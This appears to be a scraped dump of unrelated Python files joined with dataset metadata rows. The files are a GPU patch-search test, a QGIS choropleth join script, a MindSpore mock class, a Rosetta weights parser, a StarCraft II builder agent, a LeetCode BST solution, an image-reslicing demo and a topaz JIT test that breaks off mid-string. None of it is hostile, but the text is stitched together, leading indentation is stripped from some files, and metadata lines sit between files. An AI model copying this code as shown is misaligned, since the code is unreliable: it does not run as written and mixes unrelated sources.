def exec_kn3_search_exh(self,K,clean,flows,sigma,args,bufs,pfill):
# -- unpack --
device = clean.device
shape = clean.shape
t,c,h,w = shape
# -- prepare kn3 search --
index,npix = 0,t*h*w
args.k = K
numQueryTotal = (npix-1)//args.queryStride+1
# -- search --
kn3.run_search(clean,0,numQueryTotal,flows,sigma,args,bufs,pfill=pfill)
th.cuda.synchronize()
# -- unpack --
kn3_dists = bufs.dists
kn3_inds = bufs.inds
kn3_patches = bufs.patches
return kn3_dists,kn3_patches
def exec_kn3_search_bch(self,K,clean,flows,sigma,args,bufs,pfill):
# -- unpack --
device = clean.device
shape = clean.shape
t,c,h,w = shape
# -- prepare kn3 search --
index,npix = 0,t*h*w
args.k = K
bsize = 1000
numQueryTotal = (npix-1)//args.queryStride+1
nbatches = (numQueryTotal-1)//bsize + 1
def view_buffer(bufs,batch,bsize):
# -- get slice --
start = batch * bsize
end = (batch+1) * bsize
bslice = slice(start,end)
# -- apply slice --
view_bufs = edict()
for key,val in bufs.items():
view_bufs[key] = val[bslice]
return view_bufs
# -- iterate over batches --
for batch in range(nbatches):
# -- view buffer --
view_bufs = view_buffer(bufs,batch,bsize)
# -- search --
qstart = bsize*batch
bsize_b = min(bsize,numQueryTotal - qstart)
# print(view_bufs.dists.shape,bsize_b,qstart,numQueryTotal,batch,nbatches,bsize)
assert bsize_b > 0,"strictly positive batch size."
kn3.run_search(clean,qstart,bsize_b,flows,sigma,
args,view_bufs,pfill=pfill)
th.cuda.synchronize()
kn3_dists = bufs.dists
kn3_patches = bufs.patches
return kn3_dists,kn3_patches
#
# -- [Exec] Sim Search --
#
def run_comparison(self,noisy,clean,sigma,flows,args,pfill):
# -- fixed testing params --
K = 15
BSIZE = 50
NBATCHES = 3
shape = noisy.shape
device = noisy.device
t,c,h,w = shape
npix = h*w
bstride = 1
# -- create empty bufs --
exh_bufs = edict()
exh_bufs.patches = None
exh_bufs.dists = None
exh_bufs.inds = None
# -- setup args --
args['stype'] = "faiss"
args['vpss_mode'] = "exh"
args['queryStride'] = 7
args['bstride'] = args['queryStride']
# args['vpss_mode'] = "vnlb"
# -- empty bufs --
bch_bufs = get_empty_bufs(K,args,shape,device)
# -- exec over batches --
for index in range(NBATCHES):
# -- get data --
clean = 255.*th.rand_like(clean).type(th.float32)
# clean /= 255.
# clean *= 255.
noisy = clean.clone()
# -- search using batching --
bch_dists,bch_patches = self.exec_kn3_search_bch(K,clean,flows,sigma,
args,bch_bufs,pfill)
# -- search using exh search --
exh_dists,exh_patches = self.exec_kn3_search_exh(K,clean,flows,sigma,
args,exh_bufs,pfill)
# -- to numpy --
bch_dists = bch_dists.cpu().numpy()
exh_dists = exh_dists.cpu().numpy()
bch_patches = bch_patches.cpu().numpy()
exh_patches = exh_patches.cpu().numpy()
# -- allow for swapping of "close" values --
np.testing.assert_array_equal(exh_dists,bch_dists)
if pfill:
np.testing.assert_array_equal(exh_patches,bch_patches)
def run_single_test(self,dname,sigma,comp_flow,pyargs):
noisy,clean = self.do_load_data(dname,sigma)
flows = self.do_load_flow(False,clean,sigma,noisy.device)
# -- fill patches --
self.run_comparison(noisy,clean,sigma,flows,pyargs,True)
# -- fill dists only --
self.run_comparison(noisy,clean,sigma,flows,pyargs,False)
def test_batch_sim_search(self):
# -- init save path --
np.random.seed(123)
save_dir = SAVE_DIR
if not save_dir.exists():
save_dir.mkdir(parents=True)
# -- test 1 --
sigma = 25.
dname = "text_tourbus_64"
comp_flow = False
args = edict({'ps':7,'pt':1,'c':3})
self.run_single_test(dname,sigma,comp_flow,args)
| 7,191 | 28 | 335 |
052cd3f78110394dd7657e73f8d3f7bab57102d4 | 1,878 | py | Python | resources/en/docs/performing_table_joins_pyqgis/scripts/join_attributes.py | spatialthoughts/qgis-tutorials | dc1c6027de72e4875d8d5428fbc1f453b51e0468 | [
"CC-BY-4.0"
] | 34 | 2015-05-11T14:54:47.000Z | 2022-02-11T06:16:48.000Z | resources/en/docs/performing_table_joins_pyqgis/scripts/join_attributes.py | Santhosh-M31/qgis-tutorials | d22c534219689cff663b9b91b7d6e0e658f83b0d | [
"CC-BY-4.0"
] | 16 | 2016-04-20T10:52:10.000Z | 2022-01-08T13:57:11.000Z | resources/en/docs/performing_table_joins_pyqgis/scripts/join_attributes.py | Santhosh-M31/qgis-tutorials | d22c534219689cff663b9b91b7d6e0e658f83b0d | [
"CC-BY-4.0"
] | 34 | 2015-07-23T11:13:22.000Z | 2021-12-19T05:50:11.000Z | from PyQt4 import QtGui
zip_uri = '/vsizip/C:/Users/Ujaval/Downloads/tl_2013_06_tract.zip/tl_2013_06_tract.shp'
shp = QgsVectorLayer(zip_uri, 'tl_2013_06_tract', 'ogr')
QgsMapLayerRegistry.instance().addMapLayer(shp)
csv_uri = "file:///C:/Users/Ujaval/Downloads/ca_tracts_pop.csv?delimiter=,"
csv = QgsVectorLayer(csv_uri, "ca_tracts_pop", "delimitedtext")
QgsMapLayerRegistry.instance().addMapLayer(csv)
shpField='GEOID'
csvField='GEO.id2'
joinObject = QgsVectorJoinInfo()
joinObject.joinLayerId = csv.id()
joinObject.joinFieldName = csvField
joinObject.targetFieldName = shpField
joinObject.memoryCache = True
shp.addJoin(joinObject)
myColumn = 'ca_tracts_pop_D001 '
myRangeList = []
myOpacity = 1
ranges = []
myMin1 = 0.0
myMax1 = 3157.2
myLabel1 = 'Group 1'
myColor1 = QtGui.QColor('#f7fbff')
ranges.append((myMin1, myMax1, myLabel1, myColor1))
myMin2 = 3157.2
myMax2 = 4019.0
myLabel2 = 'Group 2'
myColor2 = QtGui.QColor('#c7dcef')
ranges.append((myMin2, myMax2, myLabel2, myColor2))
myMin3 = 4019.0
myMax3 = 4865.8
myLabel3 = 'Group 3'
myColor3 = QtGui.QColor('#72b2d7')
ranges.append((myMin3, myMax3, myLabel3, myColor3))
myMin4 = 4865.8
myMax4 = 5996.4
myLabel4 = 'Group 4'
myColor4 = QtGui.QColor('#2878b8')
ranges.append((myMin4, myMax4, myLabel4, myColor4))
myMin5 = 5996.4
myMax5 = 37452.0
myLabel5 = 'Group 5'
myColor5 = QtGui.QColor('#08306b')
ranges.append((myMin5, myMax5, myLabel5, myColor5))
for myMin, myMax, myLabel, myColor in ranges:
mySymbol = QgsSymbolV2.defaultSymbol(shp.geometryType())
mySymbol.setColor(myColor)
mySymbol.setAlpha(myOpacity)
myRange = QgsRendererRangeV2(myMin, myMax, mySymbol, myLabel)
myRangeList.append(myRange)
myRenderer = QgsGraduatedSymbolRendererV2('', myRangeList)
myRenderer.setMode(QgsGraduatedSymbolRendererV2.Quantile)
myRenderer.setClassAttribute(myColumn)
shp.setRendererV2(myRenderer)
| 28.029851 | 87 | 0.764643 | from PyQt4 import QtGui
zip_uri = '/vsizip/C:/Users/Ujaval/Downloads/tl_2013_06_tract.zip/tl_2013_06_tract.shp'
shp = QgsVectorLayer(zip_uri, 'tl_2013_06_tract', 'ogr')
QgsMapLayerRegistry.instance().addMapLayer(shp)
csv_uri = "file:///C:/Users/Ujaval/Downloads/ca_tracts_pop.csv?delimiter=,"
csv = QgsVectorLayer(csv_uri, "ca_tracts_pop", "delimitedtext")
QgsMapLayerRegistry.instance().addMapLayer(csv)
shpField='GEOID'
csvField='GEO.id2'
joinObject = QgsVectorJoinInfo()
joinObject.joinLayerId = csv.id()
joinObject.joinFieldName = csvField
joinObject.targetFieldName = shpField
joinObject.memoryCache = True
shp.addJoin(joinObject)
myColumn = 'ca_tracts_pop_D001 '
myRangeList = []
myOpacity = 1
ranges = []
myMin1 = 0.0
myMax1 = 3157.2
myLabel1 = 'Group 1'
myColor1 = QtGui.QColor('#f7fbff')
ranges.append((myMin1, myMax1, myLabel1, myColor1))
myMin2 = 3157.2
myMax2 = 4019.0
myLabel2 = 'Group 2'
myColor2 = QtGui.QColor('#c7dcef')
ranges.append((myMin2, myMax2, myLabel2, myColor2))
myMin3 = 4019.0
myMax3 = 4865.8
myLabel3 = 'Group 3'
myColor3 = QtGui.QColor('#72b2d7')
ranges.append((myMin3, myMax3, myLabel3, myColor3))
myMin4 = 4865.8
myMax4 = 5996.4
myLabel4 = 'Group 4'
myColor4 = QtGui.QColor('#2878b8')
ranges.append((myMin4, myMax4, myLabel4, myColor4))
myMin5 = 5996.4
myMax5 = 37452.0
myLabel5 = 'Group 5'
myColor5 = QtGui.QColor('#08306b')
ranges.append((myMin5, myMax5, myLabel5, myColor5))
for myMin, myMax, myLabel, myColor in ranges:
mySymbol = QgsSymbolV2.defaultSymbol(shp.geometryType())
mySymbol.setColor(myColor)
mySymbol.setAlpha(myOpacity)
myRange = QgsRendererRangeV2(myMin, myMax, mySymbol, myLabel)
myRangeList.append(myRange)
myRenderer = QgsGraduatedSymbolRendererV2('', myRangeList)
myRenderer.setMode(QgsGraduatedSymbolRendererV2.Quantile)
myRenderer.setClassAttribute(myColumn)
shp.setRendererV2(myRenderer)
| 0 | 0 | 0 |
e9ca77146ed2bffe1b60cd117932ccb63e35a1f2 | 1,719 | py | Python | tests/utils/mindspore/nn/cell.py | fapbatista/mindinsight | db5769eb80cbd13a2a9af7682c11f5667d8bf141 | [
"Apache-2.0"
] | 216 | 2020-03-28T02:11:56.000Z | 2022-03-31T06:20:09.000Z | tests/utils/mindspore/nn/cell.py | fapbatista/mindinsight | db5769eb80cbd13a2a9af7682c11f5667d8bf141 | [
"Apache-2.0"
] | 13 | 2020-03-31T03:00:12.000Z | 2021-01-03T13:01:06.000Z | tests/utils/mindspore/nn/cell.py | fapbatista/mindinsight | db5769eb80cbd13a2a9af7682c11f5667d8bf141 | [
"Apache-2.0"
] | 21 | 2020-03-28T02:41:06.000Z | 2021-11-24T12:20:25.000Z | # Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Mock the MindSpore mindspore/train/callback.py."""
from collections import OrderedDict
class Cell:
"""Mock the Cell class."""
@property
def auto_prefix(self):
"""The property of auto_prefix."""
return self._auto_prefix
@property
def pips(self):
"""The property of pips."""
return self._pips
class WithLossCell(Cell):
"""Mocked WithLossCell class."""
class TrainOneStepWithLossScaleCell(Cell):
"""Mocked TrainOneStepWithLossScaleCell."""
| 31.254545 | 78 | 0.658522 | # Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Mock the MindSpore mindspore/train/callback.py."""
from collections import OrderedDict
class Cell:
"""Mock the Cell class."""
def __init__(self, auto_prefix=True, pips=None):
if pips is None:
pips = dict()
self._cells = OrderedDict()
self._auto_prefix = auto_prefix
self._pips = pips
@property
def auto_prefix(self):
"""The property of auto_prefix."""
return self._auto_prefix
@property
def pips(self):
"""The property of pips."""
return self._pips
class WithLossCell(Cell):
"""Mocked WithLossCell class."""
def __init__(self, backbone, loss_fn):
super(WithLossCell, self).__init__()
self._backbone = backbone
self._loss_fn = loss_fn
class TrainOneStepWithLossScaleCell(Cell):
"""Mocked TrainOneStepWithLossScaleCell."""
def __init__(self, network=None, optimizer=None):
super(TrainOneStepWithLossScaleCell, self).__init__()
self.network = network
self.optimizer = optimizer
| 464 | 0 | 80 |
dd72cf24d5f1b4236d53dfa74ea8753ce33e368d | 1,605 | py | Python | rosettautil/rosetta/weights.py | decarboxy/py_protein_utils | 4cbb5d6d3cf32d4240e0dc9b17e4330775663de0 | [
"MIT"
] | 10 | 2015-10-07T08:43:56.000Z | 2020-11-11T16:53:06.000Z | rosettautil/rosetta/weights.py | decarboxy/py_protein_utils | 4cbb5d6d3cf32d4240e0dc9b17e4330775663de0 | [
"MIT"
] | null | null | null | rosettautil/rosetta/weights.py | decarboxy/py_protein_utils | 4cbb5d6d3cf32d4240e0dc9b17e4330775663de0 | [
"MIT"
] | 3 | 2017-02-06T17:55:14.000Z | 2020-09-01T02:00:35.000Z | from rosettautil.util import fileutil
aa_codes_in_order = ["ALA","CYS","ASP","GLU","PHE","GLY","HIS","ILE","LYS","LEU","MET","ASN","PRO","GLN","ARG","SER","THR","VAL","TRP","TYR"]
| 33.4375 | 141 | 0.568224 | from rosettautil.util import fileutil
aa_codes_in_order = ["ALA","CYS","ASP","GLU","PHE","GLY","HIS","ILE","LYS","LEU","MET","ASN","PRO","GLN","ARG","SER","THR","VAL","TRP","TYR"]
class WeightFile:
def __init__(self):
self.ref_energies = {}
self.weights = {}
def read_file(self,filename):
self.ref_energies = {}
self.weights = {}
in_file = fileutil.universal_open(filename,'rU')
for line in in_file:
line = line.split()
if line[0] == "METHOD_WEIGHTS":
#Reference energies are ordered by 1 letter name
for aa, value in zip(aa_codes_in_order,line[2:len(line)]):
self.ref_energies[aa] = float(value)
else:
self.weights[line[0]] = float(line[1])
in_file.close()
def write_file(self,filename):
out_file = fileutil.universal_open(filename,'w')
#write reference energies
out_file.write("METHOD_WEIGHTS\tref")
for key in aa_codes_in_order:
out_file.write("\t"+str(self.ref_energies[key]))
out_file.write("\n")
#write the other weights
for key in self.weights:
out_file.write(key+"\t"+str(self.weights[key])+"\n")
out_file.close()
def get_ref(self,aa):
return self.ref_energies[aa]
def get_weight(self,term):
return self.weights[term]
def set_ref(self,aa,value):
self.ref_energies[aa] = value
def set_weight(self,term,value):
self.weights[term] = value
| 1,199 | -4 | 230 |
9d0df4002773c9b26be27fbcbcc0c6e20aec5740 | 9,347 | py | Python | bot/starpruuuft/agents/builder.py | PruuuGames/StarPruuuft | 865bc7f897ccb97d1ca4334ea7a1621a38285a35 | [
"MIT"
] | 1 | 2018-07-07T08:09:44.000Z | 2018-07-07T08:09:44.000Z | bot/starpruuuft/agents/builder.py | PruuuGames/StarPruuuft | 865bc7f897ccb97d1ca4334ea7a1621a38285a35 | [
"MIT"
] | null | null | null | bot/starpruuuft/agents/builder.py | PruuuGames/StarPruuuft | 865bc7f897ccb97d1ca4334ea7a1621a38285a35 | [
"MIT"
] | 2 | 2018-07-07T20:32:14.000Z | 2018-07-08T22:09:37.000Z | from sc2.constants import *
from sc2.position import Point2
from bot.starpruuuft.agent_message import AgentMessage
from .agent import Agent
from .. import utilities
# Reconhece um depot localizado na rampa
# Faz o cache da localização dos depots de rampa
| 40.995614 | 119 | 0.650476 | from sc2.constants import *
from sc2.position import Point2
from bot.starpruuuft.agent_message import AgentMessage
from .agent import Agent
from .. import utilities
class BuilderAgent(Agent):
    """Construction agent: builds supply depots, refineries, barracks,
    factory, starport and their add-ons, each tier unlocking the next.

    ``on_step`` re-evaluates every build rule each game step; ``_cache``
    refreshes the cached structure references those rules read.
    """
    def __init__(self, bot):
        super().__init__(bot)
        # React to enemy proximity by raising/lowering the ramp depots.
        self.add_message_handler(AgentMessage.ENEMIES_CLOSE, self._handle_enemies_near)
        # Tags of supply depots already seen (avoids re-announcing them).
        self._tracked_depots = []
        # Ramp wall-off spots; filled lazily by _setup_depos.
        self._depots_locations = None
        # Positions of the vespene geysers next to the command center.
        self._geyser_locations = None
        # Whether ramp depots should currently be raised (enemies nearby).
        self._supply_depots_raised = False
        self._supply_depot_count = 0
        self._refineries = None
        # Cached structure references, refreshed by _cache:
        self._barracks_clear = None
        self._barracks_tech = None
        self._barracks_reactor = None
        self._factory_clear = None
        self._factory_tech = None
        self._starport_clear = None
        self._starport_reactor = None
        self._marine = 0
        # True once BARRACKS_READY has been sent to the BaseAgent.
        self._notified = False
    async def on_step(self, bot, iteration):
        """Run every build rule for this game step."""
        # Runs only once: cache the ramp wall-off locations.
        if self._depots_locations is None:
            self._setup_depos(bot)
        # Without a command center the agent does nothing.
        cc = utilities.get_command_center(bot)
        if cc is None:
            return
        if self._geyser_locations is None:
            vgs = bot.state.vespene_geyser.closer_than(10.0, cc)
            self._geyser_locations = [vg.position.to2 for vg in vgs]
        # Announce (once) that the first barracks is available.
        if self._barracks_clear is not None and not self._notified:
            self._notified = True
            self.send("BaseAgent", AgentMessage.BARRACKS_READY)
        await self._build_supply_depot(bot, cc)
        await self._build_refinery(bot, cc)
        await self._build_barracks(bot, cc)
        await self._build_barracks_tech(bot)
        await self._build_barracks_reactor(bot)
        await self._build_factory(bot)
        await self._build_factory_tech(bot)
        await self._build_starport(bot)
        await self._build_starport_reactor(bot)
    def _handle_enemies_near(self, *args):
        # args[0]: bool — raise the ramp depots while enemies are close.
        self._supply_depots_raised = args[0]
    def _setup_depos(self, bot):
        # Cache the ramp wall-off depot locations (corner point of each spot).
        self._depots_locations = [
            Point2((max({p.x for p in d}), min({p.y for p in d})))
            for d in bot.main_base_ramp.top_wall_depos
        ]
    def is_ramp_supply_depot(self, depot):
        # A depot counts as a ramp depot when within 2 units of a wall spot.
        return min([depot.position.to2.distance_to(depot_location) for depot_location in self._depots_locations]) <= 2
    async def _build_supply_depot(self, bot, cc):
        """Track finished depots, toggle their raised state, build new ones."""
        depots = bot.get_units([UnitTypeId.SUPPLYDEPOT, UnitTypeId.SUPPLYDEPOTLOWERED])
        depot_count = depots.amount
        # Register newly finished supply depots.
        not_tracked_depots = [depot for depot in depots if depot.tag not in self._tracked_depots]
        for depot in not_tracked_depots:
            self._tracked_depots.append(depot.tag)
            if self.is_ramp_supply_depot(depot):
                self.send("StrategyAgent", AgentMessage.RAMP_SUPPLY_DEPOT, depot.tag)
            # Adjust the depot's raised/lowered state by enemy presence.
            if self._supply_depots_raised and depot.type_id is UnitTypeId.SUPPLYDEPOTLOWERED:
                await bot.do(depot(AbilityId.MORPH_SUPPLYDEPOT_RAISE))
            elif not self._supply_depots_raised and depot.type_id is UnitTypeId.SUPPLYDEPOT:
                await bot.do(depot(AbilityId.MORPH_SUPPLYDEPOT_LOWER))
            elif depot.type_id == UnitTypeId.SUPPLYDEPOT:
                # Depots that are not on the ramp should stay lowered.
                await bot.do(depot(AbilityId.MORPH_SUPPLYDEPOT_LOWER))
        # Once barracks exist the ramp must be closed with all 3 depots;
        # before that a single depot is enough.
        enough_depots = depot_count >= 1
        if self._barracks_clear is not None or self._barracks_tech is not None:
            enough_depots = depot_count >= 3
        if enough_depots and bot.supply_left > 5:
            return
        # Build one supply depot (ramp spots first, then behind the CC).
        if bot.already_pending(UnitTypeId.SUPPLYDEPOT) < 1 and bot.can_afford(UnitTypeId.SUPPLYDEPOT):
            if depot_count < len(self._depots_locations):
                depot_location = list(self._depots_locations)[depot_count]
                await bot.build(UnitTypeId.SUPPLYDEPOT, near=depot_location, max_distance=2, placement_step=1)
            else:
                await bot.build(UnitTypeId.SUPPLYDEPOT, near=cc.position.towards(
                    bot.game_info.map_center, -20))
    async def _build_refinery(self, bot, cc):
        """Build up to two refineries on the geysers next to the CC."""
        if self._refineries.amount >= 2:
            return
        # The second refinery waits until some barracks exists.
        if self._refineries.amount == 1 and self._barracks_clear is None and self._barracks_tech is None:
            return
        # Allows the construction of up to 2 refineries.
        if bot.can_afford(UnitTypeId.REFINERY):
            vgs = bot.state.vespene_geyser.closer_than(10.0, cc)
            for vg in vgs:
                if bot.units(UnitTypeId.REFINERY).closer_than(1.0, vg).exists:
                    break
                worker = bot.select_build_worker(vg.position)
                if worker is None:
                    break
                await bot.do(worker.build(UnitTypeId.REFINERY, vg))
                break
    async def _build_barracks(self, bot, cc):
        """Build a barracks; a second one only after tech lab + starport reactor."""
        if self._barracks_clear is not None:
            return
        if self._supply_depot_count < 1:
            return
        if self._barracks_tech is not None and self._starport_reactor is None:
            return
        if self._barracks_tech is not None and self._barracks_reactor is not None:
            return
        if bot.already_pending(UnitTypeId.BARRACKS) < 1 and bot.can_afford(UnitTypeId.BARRACKS):
            # First barracks close to the CC, second one further out.
            if self._barracks_tech is None:
                position = utilities.get_center_relative_position(bot, cc, 3.5)
            else:
                position = utilities.get_center_relative_position(bot, cc, 7.5)
            await bot.build(UnitTypeId.BARRACKS, near=position)
    async def _build_barracks_tech(self, bot):
        """Attach a tech lab to the free barracks."""
        if self._barracks_tech is not None or self._barracks_clear is None:
            return
        # NOTE(review): redundant — already covered by the check above.
        if self._barracks_clear is None:
            return
        if bot.already_pending(UnitTypeId.BARRACKSTECHLAB) < 1 and bot.can_afford(UnitTypeId.BARRACKSTECHLAB):
            await bot.do(self._barracks_clear.build(UnitTypeId.BARRACKSTECHLAB))
    async def _build_barracks_reactor(self, bot):
        """Attach a reactor to the free barracks (after the starport reactor)."""
        if self._barracks_reactor is not None or self._barracks_clear is None:
            return
        if self._starport_reactor is None:
            return
        if bot.already_pending(UnitTypeId.BARRACKSREACTOR) < 1 and bot.can_afford(UnitTypeId.BARRACKSREACTOR):
            await bot.do(self._barracks_clear.build(UnitTypeId.BARRACKSREACTOR))
    async def _build_factory(self, bot):
        """Build the factory (requires a barracks tech lab)."""
        if self._factory_clear is not None or self._factory_tech is not None:
            return
        if self._barracks_tech is None:
            return
        if bot.already_pending(UnitTypeId.FACTORY) < 1 and bot.can_afford(UnitTypeId.FACTORY):
            position = utilities.get_center_relative_position(bot, self._geyser_locations[0], 4)
            await bot.build(UnitTypeId.FACTORY, near=position)
    async def _build_factory_tech(self, bot):
        """Attach a tech lab to the factory."""
        if self._factory_tech is not None:
            return
        if self._factory_clear is None:
            return
        if bot.already_pending(UnitTypeId.FACTORYTECHLAB) < 1 and bot.can_afford(UnitTypeId.FACTORYTECHLAB):
            await bot.do(self._factory_clear.build(UnitTypeId.FACTORYTECHLAB))
    async def _build_starport(self, bot):
        """Build the starport (requires factory and barracks tech lab)."""
        if self._starport_clear is not None or self._starport_reactor is not None:
            return
        if self._factory_clear is None or self._barracks_tech is None:
            return
        if bot.already_pending(UnitTypeId.STARPORT) < 1 and bot.can_afford(UnitTypeId.STARPORT):
            position = utilities.get_center_relative_position(bot, self._geyser_locations[1], 4)
            await bot.build(UnitTypeId.STARPORT, near=position)
    async def _build_starport_reactor(self, bot):
        """Attach a reactor to the starport."""
        if self._starport_reactor is not None:
            return
        if self._starport_clear is None:
            return
        if bot.already_pending(UnitTypeId.STARPORTREACTOR) < 1 and bot.can_afford(UnitTypeId.STARPORTREACTOR):
            await bot.do(self._starport_clear.build(UnitTypeId.STARPORTREACTOR))
    def _cache(self, bot):
        """Refresh the cached references/counts read by the build rules."""
        self._barracks_clear, self._barracks_tech, self._barracks_reactor = utilities.get_barracks(bot)
        self._factory_clear, self._factory_tech = utilities.get_factory(bot)
        self._starport_clear, self._starport_reactor = utilities.get_starport(bot)
        self._supply_depot_count = bot.get_units([UnitTypeId.SUPPLYDEPOT, UnitTypeId.SUPPLYDEPOTLOWERED]).amount
        self._refineries = bot.get_units(UnitTypeId.REFINERY) | bot.get_units(UnitTypeId.REFINERY, ready=False)
        self._marine = bot.get_units(UnitTypeId.MARINE).amount
| 8,623 | 5 | 454 |
3d754a59567807b87116dad0f01ccd707b41b83e | 1,234 | py | Python | Leetcode/Solutions/Data-Structure/BST/BST_To_Greater_Tree.py | fakecoinbase/sweetpandslashAlgorithms | 9641e31320f17c6393b7746312c4b030a7faf015 | [
"MIT"
] | 3 | 2021-04-21T07:11:33.000Z | 2022-01-09T00:05:55.000Z | Leetcode/Solutions/Data-Structure/BST/BST_To_Greater_Tree.py | sweetpand/Algorithms | 2e4dcf2d42de25531fae5b4ec0d96ce100043117 | [
"MIT"
] | null | null | null | Leetcode/Solutions/Data-Structure/BST/BST_To_Greater_Tree.py | sweetpand/Algorithms | 2e4dcf2d42de25531fae5b4ec0d96ce100043117 | [
"MIT"
] | null | null | null | from _DATATYPES import TreeNode
#Question: Given a Binary Search Tree (BST), convert it to a Greater Tree such that every key of the original BST is changed to the original key plus sum of all keys greater than the original key in BST.
#Solution: Traverse reverse in order, keep count of sums and adjust each node as needed
#Difficulty: Easy
#Note: Due to Python scoping restrictions, var s needs to be in a class to be accessed by a recusive function
main()
| 41.133333 | 203 | 0.669368 | from _DATATYPES import TreeNode
#Question: Given a Binary Search Tree (BST), convert it to a Greater Tree such that every key of the original BST is changed to the original key plus sum of all keys greater than the original key in BST.
#Solution: Traverse reverse in order, keep count of sums and adjust each node as needed
#Difficulty: Easy
#Note: Due to Python scoping restrictions, var s needs to be in a class to be accessed by a recusive function
class Solution(object):
    """Convert a BST into a "Greater Tree" in place.

    Each node's key becomes the original key plus the sum of all keys
    greater than it. The running total lives on the instance
    (``sumCount``), so it accumulates across calls on the same object.
    """
    sumCount = 0
    def convertBST(self, root):
        """Rewrite node values via a reverse in-order walk; return *root*."""
        def visit(node):
            # Largest keys first: descend the right subtree before this node.
            if node.right:
                visit(node.right)
            original = node.val
            # This node absorbs the running total of all greater keys...
            node.val = original + self.sumCount
            # ...and then contributes its own (old) value to that total.
            self.sumCount += original
            if node.left:
                visit(node.left)
        visit(root)
        # The algorithm mutates in place; root is returned for convenience.
        return root
def main():
    """Smoke test: convert a small BST and print its in-order traversal."""
    t = TreeNode(5)
    t.left = TreeNode(2)
    t.right = TreeNode(13)
    x = Solution()
    # BUG FIX: the Solution instance was created but never used, so the
    # script printed the *unconverted* tree. Run the conversion first.
    x.convertBST(t)
    print(t.printInOrder(t))
main()
| 680 | 45 | 50 |
8ed9d98f22c3a8ee19702f3bce74fcc5516af642 | 1,326 | py | Python | tests/test_reslice_coarse.py | shuohan/improc3d | 178b91a73a8bb2fabf73ea2a6e9562c39a8299ca | [
"MIT"
] | null | null | null | tests/test_reslice_coarse.py | shuohan/improc3d | 178b91a73a8bb2fabf73ea2a6e9562c39a8299ca | [
"MIT"
] | null | null | null | tests/test_reslice_coarse.py | shuohan/improc3d | 178b91a73a8bb2fabf73ea2a6e9562c39a8299ca | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import numpy as np
import nibabel as nib
import matplotlib.pyplot as plt
from improc3d.reslice import reslice3d, reslice3d_coarse
from improc3d.reslice import transform_to_axial
from improc3d.reslice import transform_to_coronal
from improc3d.reslice import transform_to_sagittal
obj = nib.load('image1.nii.gz')
image = obj.get_data()
affine = obj.affine
print(image.shape)
print(np.round(affine))
axial_c = transform_to_axial(image, affine, coarse=True)
coronal_c = transform_to_coronal(image, affine, coarse=True)
sagittal_c = transform_to_sagittal(image, affine, coarse=True)
LPIm = reslice3d(image, affine)
axial = transform_to_axial(LPIm, np.eye(4), coarse=True)
coronal = transform_to_coronal(LPIm, np.eye(4), coarse=True)
sagittal = transform_to_sagittal(LPIm, np.eye(4), coarse=True)
images = (image, axial_c, axial, coronal_c, coronal, sagittal_c, sagittal)
plt.figure()
for i, im in enumerate(images):
im = np.transpose(im, axes=[1, 0, 2])
plt.subplot(3, len(images), len(images) * 0 + i + 1)
plt.imshow(im[:, :, im.shape[2]//2], cmap='gray')
plt.subplot(3, len(images), len(images) * 1 + i + 1)
plt.imshow(im[:, im.shape[1]//2, :], cmap='gray')
plt.subplot(3, len(images), len(images) * 2 + i + 1)
plt.imshow(im[im.shape[0]//2, :, :], cmap='gray')
plt.show()
| 34 | 74 | 0.718703 | #!/usr/bin/env python
import numpy as np
import nibabel as nib
import matplotlib.pyplot as plt
from improc3d.reslice import reslice3d, reslice3d_coarse
from improc3d.reslice import transform_to_axial
from improc3d.reslice import transform_to_coronal
from improc3d.reslice import transform_to_sagittal
obj = nib.load('image1.nii.gz')
image = obj.get_data()
affine = obj.affine
print(image.shape)
print(np.round(affine))
axial_c = transform_to_axial(image, affine, coarse=True)
coronal_c = transform_to_coronal(image, affine, coarse=True)
sagittal_c = transform_to_sagittal(image, affine, coarse=True)
LPIm = reslice3d(image, affine)
axial = transform_to_axial(LPIm, np.eye(4), coarse=True)
coronal = transform_to_coronal(LPIm, np.eye(4), coarse=True)
sagittal = transform_to_sagittal(LPIm, np.eye(4), coarse=True)
images = (image, axial_c, axial, coronal_c, coronal, sagittal_c, sagittal)
plt.figure()
for i, im in enumerate(images):
im = np.transpose(im, axes=[1, 0, 2])
plt.subplot(3, len(images), len(images) * 0 + i + 1)
plt.imshow(im[:, :, im.shape[2]//2], cmap='gray')
plt.subplot(3, len(images), len(images) * 1 + i + 1)
plt.imshow(im[:, im.shape[1]//2, :], cmap='gray')
plt.subplot(3, len(images), len(images) * 2 + i + 1)
plt.imshow(im[im.shape[0]//2, :, :], cmap='gray')
plt.show()
| 0 | 0 | 0 |
abb207c40a13077c4462b4d2420e15888efa25b3 | 2,353 | py | Python | tests/jit/test_array.py | mswart/topaz | 4bc02d6f4bf29c20f045223ecb6ae8a5cc9df2ae | [
"BSD-3-Clause"
] | 1 | 2016-07-17T09:59:55.000Z | 2016-07-17T09:59:55.000Z | tests/jit/test_array.py | mswart/topaz | 4bc02d6f4bf29c20f045223ecb6ae8a5cc9df2ae | [
"BSD-3-Clause"
] | null | null | null | tests/jit/test_array.py | mswart/topaz | 4bc02d6f4bf29c20f045223ecb6ae8a5cc9df2ae | [
"BSD-3-Clause"
] | null | null | null | from .base import BaseJITTest
| 50.06383 | 131 | 0.634509 | from .base import BaseJITTest
class TestArray(BaseJITTest):
def test_subscript_assign_simple(self, topaz, tmpdir):
traces = self.run(topaz, tmpdir, """
arr = [false]
10000.times { arr[0] = true }
""")
self.assert_matches(traces[0].loop, """
label(p0, p1, p3, p4, p5, p6, p7, p8, p10, p13, i69, p21, p24, p26, p28, i40, p37, p51, p66, descr=TargetToken(4310782200))
